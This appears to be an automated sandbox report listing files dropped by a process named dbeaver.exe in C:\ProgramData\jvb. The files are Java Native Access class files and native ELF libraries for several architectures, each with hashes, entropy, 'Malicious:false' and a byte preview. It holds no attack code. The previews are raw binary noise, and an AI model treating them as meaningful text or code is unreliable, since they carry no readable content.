      Preview:.......2.l....F....G....H....I..J....I..K....L....M..N..O.P..O.Q..O.R..S....T....U....V....W....X....Y....Z..[....I..\..]...Cleanable...InnerClasses...CleanerRef...INSTANCE...Lcom/sun/jna/internal/Cleaner;...referenceQueue...Ljava/lang/ref/ReferenceQueue;...Signature..2Ljava/lang/ref/ReferenceQueue<Ljava/lang/Object;>;...cleanerThread...Ljava/lang/Thread;...firstCleanable..)Lcom/sun/jna/internal/Cleaner$CleanerRef;...getCleaner.. ()Lcom/sun/jna/internal/Cleaner;...Code...LineNumberTable...<init>...()V...LocalVariableTable...this...register..P(Ljava/lang/Object;Ljava/lang/Runnable;)Lcom/sun/jna/internal/Cleaner$Cleanable;...obj...Ljava/lang/Object;...cleanupTask...Ljava/lang/Runnable;...add..T(Lcom/sun/jna/internal/Cleaner$CleanerRef;)Lcom/sun/jna/internal/Cleaner$CleanerRef;...ref...StackMapTable...remove..,(Lcom/sun/jna/internal/Cleaner$CleanerRef;)Z...inChain...Z...access$000..>(Lcom/sun/jna/internal/Cleaner;)Ljava/lang/ref/ReferenceQueue;...x0...access$100..J(Lcom/sun/jna/internal/C
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):6628
      Entropy (8bit):5.742836296577697
      Encrypted:false
      SSDEEP:
      MD5:BF3D80DDC19A11115B2D659260CEB9DB
      SHA1:4A1FB13D8C867C6C88C616ECDA607748366F63E4
      SHA-256:FF065CE3562A22E4325A2BCCC4B4BCADC89A5D59E5384A1741910E5A13DBDB32
      SHA-512:09FE77E6D74BDF44C15DB1BDA2365D3C037FDC1F05E063DA139D562A542CCA3DD7D388B62E350E6CE200B76C4E36E7AEDB322DD34FB8859C40B22417BD6F6D5E
      Malicious:false
      Reputation:unknown
      Preview:.......2.........;.......;.......;....;................................................................................;....B.............................".......;....;.......'....;....B....;....;....;.........;....;....B....;....B....B....;....;....;....;....;....;..................................~..;....i.............................s...LOG...Ljava/util/logging/Logger;...METHOD_IS_DEFAULT...Ljava/lang/reflect/Method;...METHOD_HANDLES_LOOKUP...METHOD_HANDLES_LOOKUP_IN.. METHOD_HANDLES_PRIVATE_LOOKUP_IN..'METHOD_HANDLES_LOOKUP_UNREFLECT_SPECIAL.."METHOD_HANDLES_LOOKUP_FIND_SPECIAL...METHOD_HANDLES_BIND_TO..$METHOD_HANDLES_INVOKE_WITH_ARGUMENTS...METHOD_TYPE...CONSTRUCTOR_LOOKUP_CLASS...Ljava/lang/reflect/Constructor;...$assertionsDisabled...Z...<init>...()V...Code...LineNumberTable...LocalVariableTable...this..&Lcom/sun/jna/internal/ReflectionUtils;...getConstructorLookupClass..!()Ljava/lang/reflect/Constructor;...lookup...Ljava/lang/Class;...StackMapTable...lookupDeclaredConstructor.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 64-bit LSB shared object, ARM aarch64, version 1 (SYSV), dynamically linked, BuildID[sha1]=3b7e0ae74dcab07997de038893dbe5f692dd7665, not stripped
      Category:dropped
      Size (bytes):162288
      Entropy (8bit):5.51131367648968
      Encrypted:false
      SSDEEP:
      MD5:0AC13C81F669C97901C586CBDDAEABFA
      SHA1:1F7CF86BF79EDF8A2DF445E6752F931CFBF2A542
      SHA-256:0D0A0E6AE88416651B53F711101D3F8BB8FB59D5EFE8173AB4924C1151443C69
      SHA-512:0D85FE10480913B88251AEFB69B8D375B9599720E39B8CCAE398B5E6ED4575FDBC702129E83CB30A9C8EC59FE0B305EA167D3221062591C24B19F79BC7D9C3BC
      Malicious:false
      Reputation:unknown
      Preview:.ELF............................@........r..........@.8...@......................................7.......7......................P<......P<......P<......................................p=......p=......p=..............................................................$.......$...............P.td.....,.......,.......,..............................Q.td....................................................R.td....P<......P<......P<..........................................GNU.;~..M.y..........ve........@..............C.. "@`0.. Q...! ..$........ ...@$..2{..@c....."@..p.4B..t."@ .... X.a0.a.$4.*(<.$.@......9 ....P.Z.'#D.......P.. ".y...@....@...A...B...C...............D.......E...........H...I...M.......N...Q...S...W...Z...\...].......^..._...`...........a...d...f.......g.......i.......k...m.......o...p.......r...t...u...v...w...........x.......{...~...................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked, BuildID[sha1]=86d078a30439538d218db17624405517978dc162, not stripped
      Category:dropped
      Size (bytes):130788
      Entropy (8bit):5.843068235482487
      Encrypted:false
      SSDEEP:
      MD5:A376B7B2DAE20741650D8E580B3EA50E
      SHA1:1B1C24AE22A9CA56E8A2ACFDC1A8C6D89D3C6540
      SHA-256:60C9B98AAE984DA350DFC1B9CE7E868B3CF2A5ADF4FBF85A756AFA70602BA135
      SHA-512:65EE81740219D99C18A9D32C397AEF8D1521ECE27118AAEFEC7AFD5049B62E90913DFF8CE293928AF7CFE1CD182DE1BC3F4D3AEFD12A319B58BFEE8046AB5EE4
      Malicious:false
      Reputation:unknown
      Preview:.ELF..............(......@..4...4.......4. ...(........p............................................................................................................................................$...$...........Q.td............................R.td............t...t.......................GNU...x..9S.!..v$@U....b....E... ............. bA`... p... ..%.... ....$..@...2{O.@c....."@..r..F.Ut. @ ..(.P.!4.`S.4.*,..$.`.......1...$..B.g ....A...R.. 2.y...@........E...F...G...............H.......I...........K...L...P.......Q...T...V...Z...]..._...`.......a...b...c...........d...g...i.......j.......l.......n...p.......r...s.......u...w...x...y...z...........{.......~.............................................................................................................................................................................................................................................................................................................................t0.E.1..#....MP^
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked, BuildID[sha1]=3e9984944208d8c908cad7f9ec301e0a634f39ec, not stripped
      Category:dropped
      Size (bytes):139472
      Entropy (8bit):5.737120626731131
      Encrypted:false
      SSDEEP:
      MD5:0001EDA5EA72572E38084570813812AD
      SHA1:5A5FA04BC0A24D6EA3E576B50D79214FF071204D
      SHA-256:565319135F31EE227F19DDCA48A831ABD225E2E7A4F6F2E6FC3880CF753385B7
      SHA-512:5A3E80CA2BEE827FF0980DB0C38C41C191698EBC686B28C14D168B44287B7A082CB051A21A6660E7E1C2CB4D9FF2698A506E412132348C4DBE3EC03EBA365E43
      Malicious:false
      Reputation:unknown
      Preview:.ELF..............(......@..4... .......4. ...(........pd...d...d...................................(...(...........................................................................................$...$...........Q.td........................................GNU.>...B........0..cO9....E... ............. bA`... p... ..%.... ....$..@...2{O.@c....."@..r..F.Ut. @ ..(.P.!4.`S.4.*,..$.`.......1...$..B.g ....A...R.. 2.y...@........E...F...G...............H.......I...........K...L...P.......Q...T...V...Z...]..._...`.......a...b...c...........d...g...i.......j.......l.......n...p.......r...s.......u...w...x...y...z...........{.......~.............................................................................................................................................................................................................................................................................................................................t0.E.1..#....MP^s.......^....0B$.6'....4M.}.t...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 64-bit LSB shared object, LoongArch, version 1 (SYSV), dynamically linked, not stripped
      Category:dropped
      Size (bytes):374632
      Entropy (8bit):4.192175199655249
      Encrypted:false
      SSDEEP:
      MD5:4CDB1A0F22F3B8096B65E14C6B8E4250
      SHA1:B9BEAC6ABCC3BB04FF1CAE8E251FC01CF938FC65
      SHA-256:3566B95E0F307FD25D18A461587C644E112DB0AD9CA2D9E2DA05527782F48728
      SHA-512:31EB02482BA5032DE2EDE112DCC549414E8C276B88A8B54CA62ABD5B68442A9BF765BE0CD9807B3025757BEB63649131074C93DA2A1C7E2DF9009D1E05086F0D
      Malicious:false
      Reputation:unknown
      Preview:.ELF............................@...............C...@.8...@......................................G.......G.......@......................................4b......4b......................H}......H.......H.......H................@..............0~......0.......0...............................P.td....84......84......84..............................Q.td....................................................R.td....H}......H.......H...........................................................?.......I...@...................b...................J...1..._.......................t...z.......T...............Q...}.......B...........a...(...........K...........:...........o...y.......X.......N...\.......i...............................................4.......A...f...&.......M.......+...........5...........=...........................W...............R...........9.......O...v...........................E...c...3...x.......D.......^...............................C...[...8.......................U.......|.......
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 64-bit LSB shared object, MIPS, MIPS64 rel2 version 1 (SYSV), dynamically linked, BuildID[sha1]=77b7b93387d4f9789a86f331c6abc306017267b1, not stripped
      Category:dropped
      Size (bytes):144056
      Entropy (8bit):5.5513921842297504
      Encrypted:false
      SSDEEP:
      MD5:8533586B965D3DA11A15E4D78AB26FFB
      SHA1:6C688B901E9B82BFFF1A5949090178794626EAA2
      SHA-256:404C12AC3CB56C4F50E7C9DF95279CDC7E728C657FB8CB8ED6943C43240C175A
      SHA-512:D935753DB8C1FF4A58EC5F6FFDD955B6A0DD81315A519444532C248C7B5A2229FF1738175FD863A8C5A98514EB5430D1B62FDFE0AAAC88ED9A63EFC9986CF76E
      Malicious:false
      Reputation:unknown
      Preview:.ELF.....................U......@........*..........@.8...@. ......p....................................................................................8.......8.......................................................................................................@.......@...............................................$.......$...............P.td....`.......`.......`.......D.......D.........................................................................@......................(..............................pc.......(......<.......................pc.......(..............................pc.......(..............................pc.......(.......?......................pc.......(..............................pc.......(.......?......................pc.......(..............................pc.......(..............................pc.......(..............................pc.......(..............................pc.......(..............................pc..................GNU.w..3...x...1....rg.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 64-bit LSB shared object, 64-bit PowerPC or cisco 7500, OpenPOWER ELF V2 ABI, version 1 (SYSV), dynamically linked, BuildID[sha1]=1059998fafad02d9d83a388419b08664918fffe6, not stripped
      Category:dropped
      Size (bytes):145072
      Entropy (8bit):5.81910323109037
      Encrypted:false
      SSDEEP:
      MD5:561431A83A166E5220C001795A66B454
      SHA1:54234FAC8E0BCDF380157A8ADAC7F3DD1BCA79C1
      SHA-256:D12E08B83318E202EAEFB54958B31543C894EDA6673F361022E21474D62B686B
      SHA-512:9816F897DD518EFB1C67D13B81E028F0DF8C18E1C9378E96ABFE27A892215B12895C0448738182AC3B8B848576210660E621A4F82002951A3B52592A14CE0842
      Malicious:false
      Reputation:unknown
      Preview:.ELF.....................;......@......../..........@.8...@.....................................,.......,.......................................................x.......................................................................................................$.......$...............P.td............................|.......|...............Q.td....................................................R.td................................................................GNU..Y.......:8....d............<..............C.. "@`... ....! ..$........ ...@$..2{..@c....."@..p.4B..t."@ .... X.a0.a.$4.*(<.$.@A.....! ....@.B.!#D.......P.. ".y...@....<...=...>...?...............@.......A...........C...D...H.......I...L...N...R...U...W...X.......Y...Z...[...........\..._...a.......b.......d.......f...h.......i...j.......l...n...o...p...q...........r.......u...x...|...............................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 32-bit MSB shared object, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked, BuildID[sha1]=7ac3c10598deec0b86a7d21e87e9aabc0c4c4238, not stripped
      Category:dropped
      Size (bytes):127724
      Entropy (8bit):6.129729422079714
      Encrypted:false
      SSDEEP:
      MD5:4D919E515C84360C2F26232D24EA5A68
      SHA1:F321D3F24A02F38450F13494A112EBD430BBC3B9
      SHA-256:10AA8ADC5522BF215BA6D236400DAD5AD2238D6F0DA0B1C4595A4DE6C163C200
      SHA-512:37848DBF6EDC3BF6A67B28959B41D41EBAA9008D7CF61483C12ADD5BD4303184CA02348E9888B45E5D7846A6F98F516DA03B2F15E97EBDA128EBC5C6D419FE22
      Malicious:false
      Reputation:unknown
      Preview:.ELF......................?....4.........4. ...(.......................................................d...................d...d...d...................................$...$........dt.P...............d...d........dt.Q........................................GNU.z..............LB8.......;... ........b ....`A.. . ...%.. .......@..$2...@.O{...c@"...r..U.F.@ .t.. .P.(`.4!.4.S..,*.`.$.....1...$..a.B.... .A...R.y.2 @.........;...<...=...>...............?.......@...........B...C...G.......H...K...M...Q...T...V...W.......X...Y...Z...........[...^...`.......a.......c.......e...g.......h...i.......k...m...n...o...p...........q.......t...w...{...............~................................................................................................................................................................................................................................................................................................s..E0t.1.E.......#^PM...s.....^$B0..'6.4....}.M
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 64-bit LSB shared object, UCB RISC-V, RVC, double-float ABI, version 1 (SYSV), dynamically linked, BuildID[sha1]=9fa4ad64c8f2caa47e5bc5c0057051209d125b7d, not stripped
      Category:dropped
      Size (bytes):95984
      Entropy (8bit):6.4400248450030535
      Encrypted:false
      SSDEEP:
      MD5:90D0001461E22174E264B6486B3911F0
      SHA1:E2F353068E7CD4D144D2D1F3D2B1C63B84E9600E
      SHA-256:DFE7B9491C2EBC39E0F54A921B219A1CDB6FF4F88C1F727B7E9D642FC512F55C
      SHA-512:8C51FD825AB4F800433CBB2A0752E77EFFD231763D667709C2D0AFF6B2BD7E956D7112A4C02464B3C7302F63E5462BCD771E1605D66B3A4294FB563E32829E7F
      Malicious:false
      Reputation:unknown
      Preview:.ELF............................@.......pp..........@.8...@........p.....D......................S........................................................=.......=......................H=......HM......HM...... .......p.......................0>......0N......0N..............................................................$.......$...............P.td....01......01......01......d.......d...............Q.td....................................................R.td....H=......HM......HM..........................................GNU....d...~[...pQ ..[}........=..............C.. "@`... ....! ..$........ ...@$..2{..@c....."@..p.4B..t."@ ....(\.a0.a.$4.*(<.$.@A.....! ....@.B.!#D.......P.. ".p...@....=...>...?...@...............A.......B...............D...H...I...J...M...O...S...V...X...Y.......Z...[...\...........]...`...b.......c.......e.......g...i.......j...k.......m...o...p...q...r...........s.......v...y...}.......................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 64-bit MSB shared object, IBM S/390, version 1 (SYSV), dynamically linked, BuildID[sha1]=e4c8c9510201e426908168457b357c40c8378553, not stripped
      Category:dropped
      Size (bytes):136976
      Entropy (8bit):5.685097725124464
      Encrypted:false
      SSDEEP:
      MD5:D198B5F0A6C45435C855B29770905B71
      SHA1:C1F5EBDB65D9A55F6A991032696E7FCA14BC6510
      SHA-256:941A30FBCE7E3C96C3946F083D47F8064320C3785305B755FDBBBC865DAFFCDF
      SHA-512:E3AA3C360B630CA026FE3D5DB58F43217066639A748629BE9F3AF71466F4A5D858976EA1BA4FD3DC968AC35BF70D9BD24A9CA4A5F6D68D135A7671703065D606
      Malicious:false
      Reputation:unknown
      Preview:.ELF..........................C........@.............@.8...@.................................................................................................................................................................................................................$.......$........dt.P...................................4.......4........dt.Q....................................................dt.R................................................................GNU....Q...&..hE{5|@.7.S...........9........" ..C..... ...`@.$.. !.. .......2..$@......c@..{.p..@"..@".t..B4.X .... .4$.a.0aA@.$.<(*. 9.....!.R.P........D#y." ..P.....@.....9...:...;...<...............=.......>...........A...B...F.......G...J...L...P...S...U...V.......W...X...Y...........Z...]..._.......`.......b.......d...f.......h...i.......k...m...n...o...p...........q.......t...w...{...............~............................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=bff825f65e95b5ca616a19ff81dda890dc9b85d9, not stripped
      Category:dropped
      Size (bytes):134447
      Entropy (8bit):5.898563054077881
      Encrypted:false
      SSDEEP:
      MD5:05ECC9227ECF9CB7AA9980E189217902
      SHA1:990B83F91732744410074A7A5919688C99477462
      SHA-256:5F5B5F7A43BF5D669B9339876EFD999756C887DC85406DEB2D8A8EF935045B0F
      SHA-512:661BB1C8686A920117B9C7C42AD69B39EAD41BB1BC7382BCD44763CE432734505B477B678E22162A5E2E888EF74CE6CC2636C236D5195D49A05FFAB99A6E6CC5
      Malicious:false
      Reputation:unknown
      Preview:.ELF..............>......P......@...................@.8...@....................................................... .......................!.......!....................... .............@.......@.!.....@.!.............................................................$.......$...............P.td....................................................Q.td................................................................GNU...%.^...aj........................................k.......A... ...................[...................D...b...W.......................m...........M...........+.......y...................Z...:...........C...........)...........h...(.......P.........../...................................................H...............`...........I.......6...........;...........<.......}...................Q...B...............................F...5...........................=...\...-...n...............X.......................1.......9...U...................7...~...O.......w......._...............
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, BuildID[sha1]=d0322046c8dfbcd1cba68f6fc6d508ffa4bfc302, not stripped
      Category:dropped
      Size (bytes):123384
      Entropy (8bit):5.980079330833527
      Encrypted:false
      SSDEEP:
      MD5:8F5F1BE3EFF691A82F350A767217FE17
      SHA1:34C9ED41207BC64E949F3A15C19B4071E357E868
      SHA-256:91211A72A4BABF0D1598C69BA49E7254FB6E1D106EDFCB5C414E8D9B35B64394
      SHA-512:CB012B9421E8F11651E68435370C8945481B18162A785A38E3E8CE37ECFF00DC5F0BC76B35D42A5AE11C78FEE66C5690AB0ACD3F4B8318FA494E5265AFE0CDDF
      Malicious:false
      Reputation:unknown
      Preview:.ELF.....................@..4...0.......4. ...(....................................................................................................................$...$...........P.td.........................Q.td........................................GNU..2 F.....o....................................j.......@.......................Z...................C...1...V.......................l...........L...........5.......x...................Y...............B.......................g...&.......O...........3...................................................G...........8..._...6.......H.......\.......................;.......|...................P...A...............................E...............................<...[...%...m...............W.......................+.......:...T...................7...}...N.......v.......^.......................................)...9...e.......X...2...........=.......u.......................J...............h.......c...4...>.......D....................... ...?...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, for OpenBSD, not stripped
      Category:dropped
      Size (bytes):122942
      Entropy (8bit):5.872512849787579
      Encrypted:false
      SSDEEP:
      MD5:A48F1B963DF2A57DD7E7C6675A583D84
      SHA1:1C3621017840E25ACDD171BBEC5229511B4FC23F
      SHA-256:538E6326E1A337ABEA3CBB35DC83F167696CF79B030AD22C07B76DD11128E20A
      SHA-512:939BE8AD344D87679EADD2600E4658F63C5F79BA66182EC13137EDFF9205486028CAA9CCFE6A97E4AD8336AA4C09166736B15CEF1BD0108D39005B58F4C518FB
      Malicious:false
      Reputation:unknown
      Preview:.ELF..............>.............@.......`...........@.8...@.....................................>.......>.......................@.......@.......@.................................................!.......!.............................................!......!.....@.......@.......................................................................P.td.....~.......~.......~................................e..............!.......!.............................R.td..............!.......!.....8.......8....... .......................................................................................................................................................................................................................................H........H.......5b.!..%d.!......%b.!.h..........%Z.!.h..........%R.!.h..........%J.!.h.........%B.!.h.........%:.!.h.........%2.!.h.........%*.!.h.....p....%".!.h.....`....%..!.h.....P....%..!.h.....@....%..!.h.....0....%..!.h..... ....%..!.h..........%.!.h.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, for OpenBSD, not stripped
      Category:dropped
      Size (bytes):108073
      Entropy (8bit):6.107573398686397
      Encrypted:false
      SSDEEP:
      MD5:81F4FD28628B401BB88FCC5E16305489
      SHA1:11B58046B6FE7DA68DD3B1831BDEA1880E58886B
      SHA-256:D69EA4C6B162CE696CFEAEFBD7C186B2D8F33BC6DCF6229E1557ABCE94516C00
      SHA-512:2ACD8CD527716BF4016556B82E424D8B09974AA8BC18E064407E8EB5683E97C8E25A412239BBACA62FF42A13E64CDEE9AC2E783928384064AF8C3E8B0F59ECFF
      Malicious:false
      Reputation:unknown
      Preview:.ELF........................4...........4. ...(.....................M...M................ ..... ... .[...[..............8|..8l. 8l. ....8...............h}..hm. hm. .....................{...[. .[. ................P.tdXu..XU. XU. T...T.............e8|..8l. 8l. ................R.td8|..8l. 8l. ............ ...............................................................................................................................................U....................................h...............h...............h...............h..............h ......... ...h(.........$...h0.........(...h8....p.....,...h@....`.....0...hH....P.....4...hP....@.....8...hX....0.....<...h`.... .....@...hh..........D...hp..........H...hx..........L...h...........P...h...........T...h...........X...h..........\...h..........`...h..........d...h..........h...h.....p.....l...h.....`.....p...h.....P.....t...h.....@.....x...h.....0.....|...h..... .........h...............h...............h...............h.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1651
      Entropy (8bit):5.564057456257536
      Encrypted:false
      SSDEEP:
      MD5:860A91D4EB0DE363C6040C0154B1BF9B
      SHA1:7B672BBCEA3C3D178C81648E0200ABECEDE34A07
      SHA-256:47755A2CC62594389091C1FEA719DD7AE1EA11B5B39B47B75A1A18D4B26E499C
      SHA-512:4C6A55A012D24FF3476B3F18C4CFEFA424C44E6E4569BC4F94123FF11172E600137B678080CDF5EDB320FEF98388F8475613A48C076ABB9917A5D48E6197376A
      Malicious:false
      Reputation:unknown
      Preview:.......2.c....0..1....2....3....4..#..5....6..7..8.9..:....;..<.=..>.?..@.A..B....C..D..E....F....G..H..I...<init>...(I)V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/ptr/ByReference;...dataSize...I...toString...()Ljava/lang/String;...getValue...Ljava/lang/reflect/Method;...value...Ljava/lang/Object;...ex...Ljava/lang/Exception;...StackMapTable..J..7..H..D...SourceFile...ByReference.java....K...com/sun/jna/Memory....L..M.N..O.P...java/lang/Class..Q.R...java/lang/Object..J..S.T...null@0x%x..U.V..W..X.Y..Z..[.\..]..^._...%s@0x%x=%s..`."...java/lang/Exception..@ByReference Contract violated - %s#getValue raised exception: %s..a."..b."...com/sun/jna/ptr/ByReference...com/sun/jna/PointerType...java/lang/reflect/Method...()V...(J)V...setPointer...(Lcom/sun/jna/Pointer;)V...getClass...()Ljava/lang/Class;...getMethod..@(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;...invoke..9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;...getPointer...()Lco
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1203
      Entropy (8bit):5.192116952601652
      Encrypted:false
      SSDEEP:
      MD5:2E256D16ED96B1F5708431229DF0160D
      SHA1:9C1AE361D39C91C4A8479CC06D81C505FF4C9388
      SHA-256:AF128DC1A66EA3A11920724757D2DB882E141EC58D286A66A9E564CDB79AF13F
      SHA-512:92375AF9E471492FEB0DE1020DED4A53D58541B9B1F3BC225B98D0E875038FEA2BB15D53AD280FB124AF3BE97CB667007FFC293D900A6778FAD5A0596B3DD278
      Malicious:false
      Reputation:unknown
      Preview:.......2.F....!...."....#....$..%.&..%.'..(..)..%.*..+.,....-..../..0.1..2..3...<init>...()V...Code...LineNumberTable...LocalVariableTable...this..!Lcom/sun/jna/ptr/ByteByReference;...(B)V...value...B...setValue...getValue...()B...toString...()Ljava/lang/String;...SourceFile...ByteByReference.java.........4.......5.6..7..8.9..:.;...byte@0x%1$x=0x%2$x (%2$d)...java/lang/Object..<.=..>..?.@.......A..?.B..C..D.E...com/sun/jna/ptr/ByteByReference...com/sun/jna/ptr/ByReference...(I)V...getPointer...()Lcom/sun/jna/Pointer;...com/sun/jna/Pointer...setByte...(JB)V...getByte...(J)B...nativeValue...(Lcom/sun/jna/Pointer;)J...java/lang/Long...valueOf...(J)Ljava/lang/Long;...java/lang/Byte...(B)Ljava/lang/Byte;...java/lang/String...format..9(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;.!.......................4........*........................ ...............................G........*....*....................#...$...%.........................................B........*..................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1207
      Entropy (8bit):5.184327342110492
      Encrypted:false
      SSDEEP:
      MD5:97A4EB8305496994B4FBBD5E075FA27B
      SHA1:284DA19498030500A64965BCDB52AD81C1D25538
      SHA-256:BA0C1AE96F1E6E06EC1CC8F7B346A5DAC62FA634EE690CF0765B7422E1C7319B
      SHA-512:FC06BBC292E6F22FBAFF18014FB2C518E609C299D80606D54213F04D24DF5028A67AE9A811CC3D1995B73C3C23F2B33AB1B5CCC9F334E6A006898096D3856AE6
      Malicious:false
      Reputation:unknown
      Preview:.......2.F....!...."....#....$..%.&..%.'..(..)..%.*..+.,....-..../..0.1..2..3...<init>...()V...Code...LineNumberTable...LocalVariableTable...this..#Lcom/sun/jna/ptr/DoubleByReference;...(D)V...value...D...setValue...getValue...()D...toString...()Ljava/lang/String;...SourceFile...DoubleByReference.java.........4.......5.6..7..8.9..:.;...double@0x%x=%s...java/lang/Object..<.=..>..?.@.......A..?.B..C..D.E..!com/sun/jna/ptr/DoubleByReference...com/sun/jna/ptr/ByReference...(I)V...getPointer...()Lcom/sun/jna/Pointer;...com/sun/jna/Pointer...setDouble...(JD)V...getDouble...(J)D...nativeValue...(Lcom/sun/jna/Pointer;)J...java/lang/Long...valueOf...(J)Ljava/lang/Long;...java/lang/Double...(D)Ljava/lang/Double;...java/lang/String...format..9(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;.!.......................4........*........................................................H........*.....*'..................."...#...$.........................................B........*....'.........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1198
      Entropy (8bit):5.164771602475388
      Encrypted:false
      SSDEEP:
      MD5:4C1BBB69CAF54355063EE6017DB914D8
      SHA1:F3305C76DE22A8D0780717689272559CA9C454D8
      SHA-256:6061AFD286A3A2104461BA3985D64864A4501DFD05ED2BEF93CD6B99FFCAA26A
      SHA-512:28C68292B3D150807DF6C2E996756C8DA8886C6A1AB616A57F6DF8317C06FCDD71B3DFCDCFE76EC8356E46E50E71350BEBF6561DB036B02481719864497B2890
      Malicious:false
      Reputation:unknown
      Preview:.......2.F....!...."....#....$..%.&..%.'..(..)..%.*..+.,....-..../..0.1..2..3...<init>...()V...Code...LineNumberTable...LocalVariableTable...this.."Lcom/sun/jna/ptr/FloatByReference;...(F)V...value...F...setValue...getValue...()F...toString...()Ljava/lang/String;...SourceFile...FloatByReference.java.........4.......5.6..7..8.9..:.;...float@0x%x=%s...java/lang/Object..<.=..>..?.@.......A..?.B..C..D.E.. com/sun/jna/ptr/FloatByReference...com/sun/jna/ptr/ByReference...(I)V...getPointer...()Lcom/sun/jna/Pointer;...com/sun/jna/Pointer...setFloat...(JF)V...getFloat...(J)F...nativeValue...(Lcom/sun/jna/Pointer;)J...java/lang/Long...valueOf...(J)Ljava/lang/Long;...java/lang/Float...(F)Ljava/lang/Float;...java/lang/String...format..9(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;.!.......................4........*........................................................G........*....*#..................."...#...$.........................................B........*....#..................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1191
      Entropy (8bit):5.182800165693663
      Encrypted:false
      SSDEEP:
      MD5:9B8873BEC129D60EB376B015B850A433
      SHA1:693580DD0053A7BBC26DDEB13F6719DDF1F65B89
      SHA-256:DF3209204C5326E95161665D8F6079FB66AE7521EBC40DCFEC7258A5855D6A15
      SHA-512:263BE6CB4D29490B9E204F88B941465F176CE0AFFFDF268FEABDB12757C4BAA7B5974A48F106C24E29FF5734DD965494C3B905E730DFAF8C559886B675823800
      Malicious:false
      Reputation:unknown
      Preview:.......2.D....!....!...."....#..$.%..$.&..'..(..$.)..*.+....,..-..../.0..1..2...<init>...()V...Code...LineNumberTable...LocalVariableTable...this.. Lcom/sun/jna/ptr/IntByReference;...(I)V...value...I...setValue...getValue...()I...toString...()Ljava/lang/String;...SourceFile...IntByReference.java............3.4..5..6.7..8.9...int@0x%1$x=0x%2$x (%2$d)...java/lang/Object..:.;..<..=.>.......?..=.@..A..B.C...com/sun/jna/ptr/IntByReference...com/sun/jna/ptr/ByReference...getPointer...()Lcom/sun/jna/Pointer;...com/sun/jna/Pointer...setInt...(JI)V...getInt...(J)I...nativeValue...(Lcom/sun/jna/Pointer;)J...java/lang/Long...valueOf...(J)Ljava/lang/Long;...java/lang/Integer...(I)Ljava/lang/Integer;...java/lang/String...format..9(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;.!.......................4........*........................ ...............................G........*....*....................#...$...%.........................................B........*........................(...).
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1152
      Entropy (8bit):5.178395939429162
      Encrypted:false
      SSDEEP:
      MD5:40391546656AA6FC4DD0370D140F9312
      SHA1:C89E1E37EDDF92E6884DE21B9CC8F253E8996D05
      SHA-256:4E3F105AD77D11CC09D643940A7DA3960C833B59059015B3DED598CE891F71C6
      SHA-512:84C424FB75FFAE433B2AAF0A9CA3B568B2FF19934A50F57494C2C3D617677095D5BE9324DEDCAB9E067AC45DD6E9846B2BC1A148467D6F3AD3ADEBDC74DF08F4
      Malicious:false
      Reputation:unknown
      Preview:.......2.A.... ....!...."....#..$.%..$.&..'..(..$.)..*.+....,..-..../..0...<init>...()V...Code...LineNumberTable...LocalVariableTable...this..!Lcom/sun/jna/ptr/LongByReference;...(J)V...value...J...setValue...getValue...()J...toString...()Ljava/lang/String;...SourceFile...LongByReference.java.........1.......2.3..4..5.6..7.8...long@0x%1$x=0x%2$x (%2$d)...java/lang/Object..9.:..;..<.=.......>..?.@...com/sun/jna/ptr/LongByReference...com/sun/jna/ptr/ByReference...(I)V...getPointer...()Lcom/sun/jna/Pointer;...com/sun/jna/Pointer...setLong...(JJ)V...getLong...(J)J...nativeValue...(Lcom/sun/jna/Pointer;)J...java/lang/Long...valueOf...(J)Ljava/lang/Long;...java/lang/String...format..9(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;.!.......................4........*........................................................H........*.....*...................."...#...$.........................................B........*........................'...(........................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1585
      Entropy (8bit):5.3330404934415485
      Encrypted:false
      SSDEEP:
